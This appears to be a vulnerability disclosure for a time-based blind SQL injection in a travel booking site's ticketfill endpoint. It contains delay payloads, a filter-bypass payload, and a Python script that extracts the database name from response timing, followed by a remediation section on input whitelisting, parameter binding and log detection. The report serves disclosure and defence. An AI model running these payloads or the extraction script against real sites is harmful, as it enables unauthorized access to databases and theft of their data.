Site: https://www.hwtrip.com/


Injection point:

URL: https://www.hwtrip.com/v3/trip/order/ticketfill

POST body: priceID%5b2399%5d=0&tripID=

Parameter: tripID=

10-second delay:

priceID[2399]=0&tripID=if(now()=sysdate(),sleep(10),0)#
(screenshot 2.png: the 10-second delay)



The site does have a filter: if(ascii(mid(version(),1,1)) = 53,sleep(5),0)# returns a server error,

so the payload if(now()=sysdate(),sleep(abs(ascii(mid(lower(version()),1,1))-53)),0)# was constructed to bypass it (the comparison is replaced by a delay equal to the absolute difference, which is zero only when the character matches).

When 52 is subtracted from the ASCII value of the first character of version():
(screenshot 1.1.png)



When 53 is subtracted from the ASCII value of the first character of version():
(screenshot 1.png)



In this way each character can be determined, one position at a time, from the delay of the response.

Obtained database(): hwtrip** (a few characters were not extracted; if in doubt, the script below can be used to verify)
(screenshot 3.png)

Verification script attached:

```python
#!/usr/bin/python
#coding:utf_8
# Python 2 script (httplib, raw_input, print statements) as posted in the report,
# re-indented from a single garbled line; the target host was left blank by the author.
import httplib
import time
import urllib
import sys
import random

headers = {"Content-type": "application/x-www-form-urlencoded",
           'Accept-Language': 'zh-CN,zh;q=0.8',
           'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)',
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
           "Connection": "close",
           "Cache-Control": "no-cache"}
post_data = {"priceID[2399]": '0'}
# candidate characters tried at each position of database()
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
base_url = "/v3/trip/order/ticketfill"
user = ''


def sql():
    global post_data
    global user
    cookie = raw_input("pls input your cookie:")
    headers["Cookie"] = cookie
    for i in range(1, 22):
        for payload in payloads:
            # delay is abs(actual char - guessed char) seconds: zero only on a match
            getuser = "if(now()=sysdate(),sleep(abs(ascii(mid(lower(database()),%d,1))-%d)),0)#" % (i, ord(payload))
            post_data["tripID"] = getuser
            postdata = urllib.urlencode(post_data)
            conn = httplib.HTTPConnection('', 80, timeout=60)
            conn.request('POST', base_url, postdata, headers)
            now_time = time.time()
            html_content = conn.getresponse().read().decode('utf-8')
            # print html_content
            if time.time() - now_time < 1:
                # response came back without delay, so this character matched
                user += payload
                sys.stdout.write('\r[In Progress]' + user + '\n')
                sys.stdout.flush()
                break
            else:
                print 'WAITING...' + str(random.randint(1, 100))


if __name__ == "__main__":
    sql()
    print '\n[Done]MySQL user is ' + user
    # print time.strftime('%H:%M:%S', time.localtime())
```

Fix: filter the input.
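The fix above is one word, so here is an added example (not code from the report or from hwtrip) of what "filter" means for this endpoint: tripID is an integer id, so it is whitelisted as digits and then bound as a query parameter instead of being concatenated into the SQL text. The schema, table name and the detection helper are assumptions for the demonstration; sqlite3 stands in for the MySQL backend and the delay payload is only ever handled as data.

```python
import re
import sqlite3

# Constructed sample: the raw tripID value from the report's delay payload.
# It is treated purely as input data here and is never executed.
TIME_BASED_PAYLOAD = "if(now()=sysdate(),sleep(10),0)#"

# Hypothetical schema standing in for the real ticketfill backend (assumption).
SCHEMA = """
CREATE TABLE trip (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO trip VALUES (2399, 'sample trip');
"""


def build_query_vulnerable(trip_id):
    """The concatenation pattern the report exploits: whatever tripID contains
    becomes part of the SQL statement, so if()/sleep()/# are parsed as SQL."""
    return "SELECT id, name FROM trip WHERE id = " + trip_id


def validate_trip_id(trip_id):
    """Whitelist filter: tripID is a numeric id, so accept only 1-10 decimal digits.
    Returns the integer or raises ValueError."""
    if not re.fullmatch(r"[0-9]{1,10}", trip_id):
        raise ValueError("invalid tripID")
    return int(trip_id)


def lookup_trip(conn, trip_id):
    """Validate first, then bind the value as a parameter; bound values can never
    change the structure of the statement, so sleep() cannot be reached."""
    tid = validate_trip_id(trip_id)
    return conn.execute("SELECT id, name FROM trip WHERE id = ?", (tid,)).fetchone()


def looks_like_time_based_injection(value):
    """Log/WAF triage helper (assumption): flags the MySQL delay primitives the
    report relies on, sleep() and benchmark(), in a submitted parameter value."""
    return re.search(r"\b(sleep|benchmark)\s*\(", value.lower()) is not None


def demo():
    """Runs the vulnerable builder and the hardened lookup side by side."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    injected = "sleep(10)" in build_query_vulnerable(TIME_BASED_PAYLOAD)
    try:
        lookup_trip(conn, TIME_BASED_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    good_row = lookup_trip(conn, "2399")
    return injected, rejected, good_row


if __name__ == "__main__":
    print(demo())  # (True, True, (2399, 'sample trip'))
```

The validation step alone would stop this report's payload, but the parameter binding is what removes the class of bug: even a value that passes a looser filter cannot become SQL syntax. The `looks_like_time_based_injection` helper is the corresponding detection check to run over request logs for the ticketfill endpoint; a legitimate tripID never contains a function call.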